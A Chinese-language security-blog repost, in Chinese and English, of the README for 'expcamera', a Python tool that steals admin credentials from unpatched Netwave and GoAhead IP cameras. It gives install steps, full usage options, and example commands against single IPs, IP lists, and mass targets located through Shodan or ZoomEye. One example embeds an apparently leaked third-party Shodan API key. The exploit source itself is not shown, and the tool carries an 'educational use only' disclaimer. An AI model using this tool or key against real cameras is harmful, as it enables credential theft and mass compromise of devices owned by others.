利用Netwave和GoAhead IP摄像机

  • A+
所属分类:安全文章

进行攻击Expcamera是用于利用易受攻击的Netwave和GoAhead IP摄像机获取用户名和密码的工具。
环境:Linux,Python3

注意:此工具仅用于教育用途!
请遵守当地法律法规!

安装

git clone https://github.com/vanpersiexp/expcamera.git  pip3 install -r related.txt

用法

python3 exploit_camera.py -h  
usage: exploit_camera.py [-h] [-b {1,2}] [-o OUTPUTFILE] [-T TIMEOUT] [-t TASKS] [-q | -v] [-i IP | -l INPUTFILE | --shodan SHODAN | --zoomeye ZOOMEYE]
Exploit IP Camera. Please use it just in educational purpose!
optional arguments: -h, --help show this help message and exit -b {1,2},--brand {1,2} Choose the brand of IP Camera. 1 represents Netwave,2 represents GoAhead. -o OUTPUTFILE,--output OUTPUTFILE Output into path you input.The default path in dir /tmp -T TIMEOUT,--timeout TIMEOUT The default timout for netwave is 300s. -t TASKS,--task TASKS Run TASKS number of connects in parallel,default is 10 -c COUNT,--count COUNT The number of ip you want to get from ZoomEye.The maximum is 2000. Default is 100. -q,--quiet Quiet mode. -v,--verbose Show more informations. -i IP,--ip IP The camera's ip and port.Example: 192.168.1.100:80 -l INPUTFILE,--list INPUTFILE The camera's ip:port address file. The file's format like this 192.168.1.100:80 in a line. --shodan SHODAN Your Shodan API Key. You can get help from https://www.shodan.io/ --zoomeye ZOOMEYE Your ZoomEye API Key. You can get help from https://www.zoomeye.org/api

例子

1,受害者IP摄像机的品牌为Netwave,IP为192.168.1.100,端口为80。

python3 exploit_camera.py -b 1 -i 192.168.1.100:80 -v

2.受害者IP摄像机的品牌是GoAhead.iplist.txt已给出。
iplist.txt显示如下:
192.168.1.10 :80
192.168.1.100:81
192.168.1.200:8080

python3 exploit_camera.py -b 2 -l iplist.txt -v

3,使用Shodan API Key来利用GoAhead(API Key来自互联网)

python3 exploit_camera.py -b 2 -v --shodan lIzylEk4vS3k8TtAR9QreK24tG0b8xBZ

参考

http://www.cnvd.org.cn/flaw/show/CNVD-2017-01037
http://cn.0day.today/exploit/26889
https://pierrekim.github.io/blog/2017-03- 08-camera-goahead-0day.html
http://www.cert.org.cn/publish/main/9/2017/20170320152751379109105282/20170320152751379105282_.html


中文版

Netwave和的GoAhead多款摄像头密码泄漏漏洞的利用工具
本工具用于针对仍未修补漏洞的摄像头,可以获取摄像头的管理员账户和密码
使用环境:Linux中,Python3。

注意:此工具只用于学习交流目的。
请严格遵守您所在国家/地区的法律法规!

安装

git clone https://github.com/vanpersiexp/expcamera.git  pip3 install -r related.txt

使用

python3 exploit_camera.py -h  
usage: exploit_camera.py [-h] [-b {1,2}] [-o OUTPUTFILE] [-T TIMEOUT] [-t TASKS] [-q | -v] [-i IP | -l INPUTFILE | --shodan SHODAN | --zoomeye ZOOMEYE]
Exploit IP Camera. Please use it just in educational purpose!
optional arguments: -h, --help show this help message and exit.帮助信息 -b {1,2} Choose the brand of IP Camera. 1 represents Netwave,2 represents GoAhead.选择摄像头品牌,1代表Netwave2代表GoAhead -o OUTPUTFILE Output into path you input.The default path in dir /tmp.输出文件路径,默认为/tmp -T TIMEOUT The default timout for netwave is 300s.默认超时时间为300s。 -t TASKS Run TASKS number of connects in parallel,default is 10.多任务同时处理,默认为10 -c COUNT The number of ip you want to get from ZoomEye.The maximum is 2000. Default is 100. 你可以从ZoomEye上获取的ip数量。最大值为2000。默认值为100 -q Quiet mode.安静模式。 -v Show more informations.显示更多信息。 -i IP The camera's ip and port.Example: 192.168.1.100:80.摄像头ip和port形式。例如:192.168.1.100:80 -l INPUTFILE The camera's ip:port address file. The file's format like this 192.168.1.100:80 in a line.摄像头ip和port文件格式。每一行都以192.168.1.100:80的形式。 --shodan SHODAN Your Shodan API Key. You can get help from https://www.shodan.io/ShodanAPI Key。你可以从https://www.shodan.io/获取帮助。 --zoomeye ZOOMEYE Your ZoomEye API Key. You can get help from https://www.zoomeye.org/apiZoomEyeAPI Key。你可以从https://www.zoomeye.org/api获取帮助。

例子

1.摄像头品牌为Netwave。IP地址为192.168.1.100,端口端口为80。

python3 exploit_camera.py -b 1 -i 192.168.1.100:80 -v

2.摄像头品牌为GoAhead.IP地址文件iplist.txt如下所示:
192.168.1.10:80
192.168.1.100:81
192.168.1.200:8080

python3 exploit_camera.py -b 2 -l iplist.txt -v

3.使用Shodan的API密钥进行攻击GoAhead品牌摄像头。

python3 exploit_camera.py -b 2 -v --shodan lIzylEk4vS3k8TtAR9QreK24tG0b8xBZ

参考

http://www.cnvd.org.cn/flaw/show/CNVD-2017-01037
http://cn.0day.today/exploit/26889
https://pierrekim.github.io/blog/2017-03- 08-camera-goahead-0day.html
http://www.cert.org.cn/publish/main/9/2017/20170320152751379109105282/20170320152751379105282_.html



利用Netwave和GoAhead IP摄像机

本文始发于微信公众号(Ots安全):利用Netwave和GoAhead IP摄像机

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: